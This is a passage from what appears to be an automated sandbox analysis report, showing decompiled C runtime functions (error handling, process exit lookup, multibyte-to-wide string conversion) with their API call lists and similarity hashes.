                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                      • Opcode ID: a56004089b5972ad0a29e02de495a1b2f2f015c59fa25b7900b49055df86b6b7
                                                                                                                                                                                                                                                                      • Instruction ID: 863c9369bb50cbbab21e39d033a97d0bd8ac132179a78b24aa4b7caeab552e4f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a56004089b5972ad0a29e02de495a1b2f2f015c59fa25b7900b49055df86b6b7
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E01B5332192279EBB6D35BC7C4C4663A4CEB655B9770832BF930510D9EF5148429A94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                                                                                      			E01189C30(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr _t2;
                                                                                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                                                                                      				long _t37;
                                                                                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t29 = __edx;
                                                                                                                                                                                                                                                                      				_t23 = __ecx;
                                                                                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                                                                                      				_t36 = GetLastError();
                                                                                                                                                                                                                                                                      				_t2 =  *0x121d70c; // 0x2
                                                                                                                                                                                                                                                                      				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                                                      					_t3 = E0118A67D(_t23, 1, 0x364);
                                                                                                                                                                                                                                                                      					_t31 = _t3;
                                                                                                                                                                                                                                                                      					_pop(_t25);
                                                                                                                                                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                                                                                                                                                      						_t4 = E0118A92D(_t25, _t36, __eflags,  *0x121d70c, _t31);
                                                                                                                                                                                                                                                                      						__eflags = _t4;
                                                                                                                                                                                                                                                                      						if(_t4 != 0) {
                                                                                                                                                                                                                                                                      							E01189AA2(_t25, _t31, 0x121df44);
                                                                                                                                                                                                                                                                      							E0118A6DA(0);
                                                                                                                                                                                                                                                                      							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                                      							__eflags = _t31;
                                                                                                                                                                                                                                                                      							if(_t31 == 0) {
                                                                                                                                                                                                                                                                      								goto L9;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_push(_t31);
                                                                                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_push(_t3);
                                                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                                                      						E0118A6DA();
                                                                                                                                                                                                                                                                      						_pop(_t25);
                                                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                                                      						SetLastError(_t36);
                                                                                                                                                                                                                                                                      						E0118A63A(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                                                                                                      						_push(_t20);
                                                                                                                                                                                                                                                                      						_push(_t36);
                                                                                                                                                                                                                                                                      						_push(_t31);
                                                                                                                                                                                                                                                                      						_t37 = GetLastError();
                                                                                                                                                                                                                                                                      						_t21 = 0;
                                                                                                                                                                                                                                                                      						_t9 =  *0x121d70c; // 0x2
                                                                                                                                                                                                                                                                      						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                                      						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                                                                                      							_t32 = E0118A67D(_t25, 1, 0x364);
                                                                                                                                                                                                                                                                      							_pop(_t27);
                                                                                                                                                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                                                                                                                                                      								_t11 = E0118A92D(_t27, _t37, __eflags,  *0x121d70c, _t32);
                                                                                                                                                                                                                                                                      								__eflags = _t11;
                                                                                                                                                                                                                                                                      								if(_t11 != 0) {
                                                                                                                                                                                                                                                                      									E01189AA2(_t27, _t32, 0x121df44);
                                                                                                                                                                                                                                                                      									E0118A6DA(_t21);
                                                                                                                                                                                                                                                                      									__eflags = _t32;
                                                                                                                                                                                                                                                                      									if(_t32 != 0) {
                                                                                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										goto L18;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_push(_t32);
                                                                                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_push(_t21);
                                                                                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                                                                                      								E0118A6DA();
                                                                                                                                                                                                                                                                      								L18:
                                                                                                                                                                                                                                                                      								SetLastError(_t37);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_t32 = E0118A8D7(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                                                                                                                                                      								L19:
                                                                                                                                                                                                                                                                      								SetLastError(_t37);
                                                                                                                                                                                                                                                                      								_t21 = _t32;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						return _t21;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t31 = E0118A8D7(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						SetLastError(_t36);
                                                                                                                                                                                                                                                                      						return _t31;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}





















                                                                                                                                                                                                                                                                      0x01189c30
                                                                                                                                                                                                                                                                      0x01189c30
                                                                                                                                                                                                                                                                      0x01189c30
                                                                                                                                                                                                                                                                      0x01189c3a
                                                                                                                                                                                                                                                                      0x01189c3c
                                                                                                                                                                                                                                                                      0x01189c41
                                                                                                                                                                                                                                                                      0x01189c44
                                                                                                                                                                                                                                                                      0x01189c52
                                                                                                                                                                                                                                                                      0x01189c59
                                                                                                                                                                                                                                                                      0x01189c5e
                                                                                                                                                                                                                                                                      0x01189c61
                                                                                                                                                                                                                                                                      0x01189c64
                                                                                                                                                                                                                                                                      0x01189c76
                                                                                                                                                                                                                                                                      0x01189c7b
                                                                                                                                                                                                                                                                      0x01189c7d
                                                                                                                                                                                                                                                                      0x01189c88
                                                                                                                                                                                                                                                                      0x01189c8f
                                                                                                                                                                                                                                                                      0x01189c94
                                                                                                                                                                                                                                                                      0x01189c97
                                                                                                                                                                                                                                                                      0x01189c99
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189c7f
                                                                                                                                                                                                                                                                      0x01189c7f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189c7f
                                                                                                                                                                                                                                                                      0x01189c66
                                                                                                                                                                                                                                                                      0x01189c66
                                                                                                                                                                                                                                                                      0x01189c67
                                                                                                                                                                                                                                                                      0x01189c67
                                                                                                                                                                                                                                                                      0x01189c6c
                                                                                                                                                                                                                                                                      0x01189ca7
                                                                                                                                                                                                                                                                      0x01189ca8
                                                                                                                                                                                                                                                                      0x01189cae
                                                                                                                                                                                                                                                                      0x01189cb3
                                                                                                                                                                                                                                                                      0x01189cb6
                                                                                                                                                                                                                                                                      0x01189cb7
                                                                                                                                                                                                                                                                      0x01189cb8
                                                                                                                                                                                                                                                                      0x01189cbf
                                                                                                                                                                                                                                                                      0x01189cc1
                                                                                                                                                                                                                                                                      0x01189cc3
                                                                                                                                                                                                                                                                      0x01189cc8
                                                                                                                                                                                                                                                                      0x01189ccb
                                                                                                                                                                                                                                                                      0x01189cd9
                                                                                                                                                                                                                                                                      0x01189ce5
                                                                                                                                                                                                                                                                      0x01189ce8
                                                                                                                                                                                                                                                                      0x01189ceb
                                                                                                                                                                                                                                                                      0x01189cfd
                                                                                                                                                                                                                                                                      0x01189d02
                                                                                                                                                                                                                                                                      0x01189d04
                                                                                                                                                                                                                                                                      0x01189d0f
                                                                                                                                                                                                                                                                      0x01189d15
                                                                                                                                                                                                                                                                      0x01189d1d
                                                                                                                                                                                                                                                                      0x01189d1f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189d06
                                                                                                                                                                                                                                                                      0x01189d06
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189d06
                                                                                                                                                                                                                                                                      0x01189ced
                                                                                                                                                                                                                                                                      0x01189ced
                                                                                                                                                                                                                                                                      0x01189cee
                                                                                                                                                                                                                                                                      0x01189cee
                                                                                                                                                                                                                                                                      0x01189d21
                                                                                                                                                                                                                                                                      0x01189d22
                                                                                                                                                                                                                                                                      0x01189d22
                                                                                                                                                                                                                                                                      0x01189ccd
                                                                                                                                                                                                                                                                      0x01189cd3
                                                                                                                                                                                                                                                                      0x01189cd7
                                                                                                                                                                                                                                                                      0x01189d2a
                                                                                                                                                                                                                                                                      0x01189d2b
                                                                                                                                                                                                                                                                      0x01189d31
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189cd7
                                                                                                                                                                                                                                                                      0x01189d38
                                                                                                                                                                                                                                                                      0x01189d38
                                                                                                                                                                                                                                                                      0x01189c46
                                                                                                                                                                                                                                                                      0x01189c4c
                                                                                                                                                                                                                                                                      0x01189c50
                                                                                                                                                                                                                                                                      0x01189c9b
                                                                                                                                                                                                                                                                      0x01189c9c
                                                                                                                                                                                                                                                                      0x01189ca6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189c50

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,01185EB1,?,?,?,01184B88,?), ref: 01189C34
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189C67
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189C8F
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 01189C9C
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 01189CA8
                                                                                                                                                                                                                                                                      • _abort.LIBCMT ref: 01189CAE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                      • Opcode ID: 02539a7fae4f935665db022a9d338f31e4bba86c7512b5b488fffbca6c20dbba
                                                                                                                                                                                                                                                                      • Instruction ID: 0c39281363212b17394a4fc92d8e09fb223ac5dd84c41aa75d2ee40ca93fc456
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02539a7fae4f935665db022a9d338f31e4bba86c7512b5b488fffbca6c20dbba
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF02D315047096BD21E72297D0CE3A36DD9FD167DF35C229F53493188EF2388428E90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0118C1FF,0118A67C,?,0118C19F,0118A67C,011DA700,0000000C,0118C2F6,0118A67C,00000002), ref: 0118C26E
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0118C281
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0118C1FF,0118A67C,?,0118C19F,0118A67C,011DA700,0000000C,0118C2F6,0118A67C,00000002,00000000), ref: 0118C2A4
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                      • Opcode ID: 6c107f20614b300d770f1621f407449dcad9afdcbd6c83e02188deae1314e350
                                                                                                                                                                                                                                                                      • Instruction ID: 13e8342fd47023a6f0d372c293406509692d578a136dcc7ef088bd3cb442c38f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c107f20614b300d770f1621f407449dcad9afdcbd6c83e02188deae1314e350
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CF04431A0020CBBDB29AF95DC0ABDD7FB9EF08655F0441ACF929A6180DF715984CB90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                                                                                      			E0118A4FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                                                                                      				int _t46;
                                                                                                                                                                                                                                                                      				int _t53;
                                                                                                                                                                                                                                                                      				void* _t55;
                                                                                                                                                                                                                                                                      				int _t57;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                                                                                      				short* _t69;
                                                                                                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                                                                                                      				short* _t71;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t34 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                                      				E01185E73(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                                      				_t57 = _a24;
                                                                                                                                                                                                                                                                      				if(_t57 == 0) {
                                                                                                                                                                                                                                                                      					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                                      					_t57 = _t53;
                                                                                                                                                                                                                                                                      					_a24 = _t53;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                                                                                      				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                                      				_v12 = _t40;
                                                                                                                                                                                                                                                                      				if(_t40 == 0) {
                                                                                                                                                                                                                                                                      					L15:
                                                                                                                                                                                                                                                                      					if(_v16 != 0) {
                                                                                                                                                                                                                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return E0118DC5F(_v8 ^ _t70);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                                                                                                                                                      					_t69 = 0;
                                                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                                                      					if(_t69 != 0) {
                                                                                                                                                                                                                                                                      						E0118F070(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                                      						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                                      						if(_t46 != 0) {
                                                                                                                                                                                                                                                                      							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                                                                                      					E0118A61A(_t69);
                                                                                                                                                                                                                                                                      					goto L15;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                                                                                                                                                      				_t63 = _t55 + 8;
                                                                                                                                                                                                                                                                      				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					_t69 = E0118BD19(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                                      					if(_t69 == 0) {
                                                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *_t69 = 0xdddd;
                                                                                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                                                                                      					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				E0118E270();
                                                                                                                                                                                                                                                                      				_t69 = _t71;
                                                                                                                                                                                                                                                                      				if(_t69 == 0) {
                                                                                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                                      				goto L9;
                                                                                                                                                                                                                                                                      			}




















                                                                                                                                                                                                                                                                      0x0118a505
                                                                                                                                                                                                                                                                      0x0118a50c
                                                                                                                                                                                                                                                                      0x0118a518
                                                                                                                                                                                                                                                                      0x0118a51d
                                                                                                                                                                                                                                                                      0x0118a522
                                                                                                                                                                                                                                                                      0x0118a527
                                                                                                                                                                                                                                                                      0x0118a52a
                                                                                                                                                                                                                                                                      0x0118a52c
                                                                                                                                                                                                                                                                      0x0118a52c
                                                                                                                                                                                                                                                                      0x0118a531
                                                                                                                                                                                                                                                                      0x0118a54a
                                                                                                                                                                                                                                                                      0x0118a550
                                                                                                                                                                                                                                                                      0x0118a555
                                                                                                                                                                                                                                                                      0x0118a5f4
                                                                                                                                                                                                                                                                      0x0118a5f8
                                                                                                                                                                                                                                                                      0x0118a5fd
                                                                                                                                                                                                                                                                      0x0118a5fd
                                                                                                                                                                                                                                                                      0x0118a619
                                                                                                                                                                                                                                                                      0x0118a619
                                                                                                                                                                                                                                                                      0x0118a55b
                                                                                                                                                                                                                                                                      0x0118a563
                                                                                                                                                                                                                                                                      0x0118a567
                                                                                                                                                                                                                                                                      0x0118a5b3
                                                                                                                                                                                                                                                                      0x0118a5b5
                                                                                                                                                                                                                                                                      0x0118a5b7
                                                                                                                                                                                                                                                                      0x0118a5bc
                                                                                                                                                                                                                                                                      0x0118a5d3
                                                                                                                                                                                                                                                                      0x0118a5db
                                                                                                                                                                                                                                                                      0x0118a5eb
                                                                                                                                                                                                                                                                      0x0118a5eb
                                                                                                                                                                                                                                                                      0x0118a5db
                                                                                                                                                                                                                                                                      0x0118a5ed
                                                                                                                                                                                                                                                                      0x0118a5ee
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a5f3
                                                                                                                                                                                                                                                                      0x0118a56e
                                                                                                                                                                                                                                                                      0x0118a570
                                                                                                                                                                                                                                                                      0x0118a572
                                                                                                                                                                                                                                                                      0x0118a57a
                                                                                                                                                                                                                                                                      0x0118a597
                                                                                                                                                                                                                                                                      0x0118a5a1
                                                                                                                                                                                                                                                                      0x0118a5a6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a5a8
                                                                                                                                                                                                                                                                      0x0118a5ae
                                                                                                                                                                                                                                                                      0x0118a5ae
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a5ae
                                                                                                                                                                                                                                                                      0x0118a57e
                                                                                                                                                                                                                                                                      0x0118a582
                                                                                                                                                                                                                                                                      0x0118a587
                                                                                                                                                                                                                                                                      0x0118a58b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a58d
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?), ref: 0118A54A
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0118A582
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0118A5D3
                                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0118A5E5
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0118A5EE
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,0118A5A1,00000000), ref: 0118BD4B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 313313983-0
                                                                                                                                                                                                                                                                      • Opcode ID: d95fd4a75b5138f8535038f02d3fbc3528d9956a2d4e7ba7dff2f8cb04b46bfa
                                                                                                                                                                                                                                                                      • Instruction ID: 34ac2e47a2ccc93ecb530c4871f2a7b282514c79661945cfd363da31410ae3af
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d95fd4a75b5138f8535038f02d3fbc3528d9956a2d4e7ba7dff2f8cb04b46bfa
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B31E372A0021AAFDF29AF68EC44EAE7BB5EF40214F148129FD14D7150E735D9A0CFA0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                                                      			E01189CB4(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr _t2;
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                                                                                      				long _t17;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                                                                                      				_t17 = GetLastError();
                                                                                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                                                                                      				_t2 =  *0x121d70c; // 0x2
                                                                                                                                                                                                                                                                      				_t20 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                                                      					_t16 = E0118A67D(_t11, 1, 0x364);
                                                                                                                                                                                                                                                                      					_pop(_t13);
                                                                                                                                                                                                                                                                      					if(_t16 != 0) {
                                                                                                                                                                                                                                                                      						_t4 = E0118A92D(_t13, _t17, __eflags,  *0x121d70c, _t16);
                                                                                                                                                                                                                                                                      						__eflags = _t4;
                                                                                                                                                                                                                                                                      						if(_t4 != 0) {
                                                                                                                                                                                                                                                                      							E01189AA2(_t13, _t16, 0x121df44);
                                                                                                                                                                                                                                                                      							E0118A6DA(_t10);
                                                                                                                                                                                                                                                                      							__eflags = _t16;
                                                                                                                                                                                                                                                                      							if(_t16 != 0) {
                                                                                                                                                                                                                                                                      								goto L9;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_push(_t16);
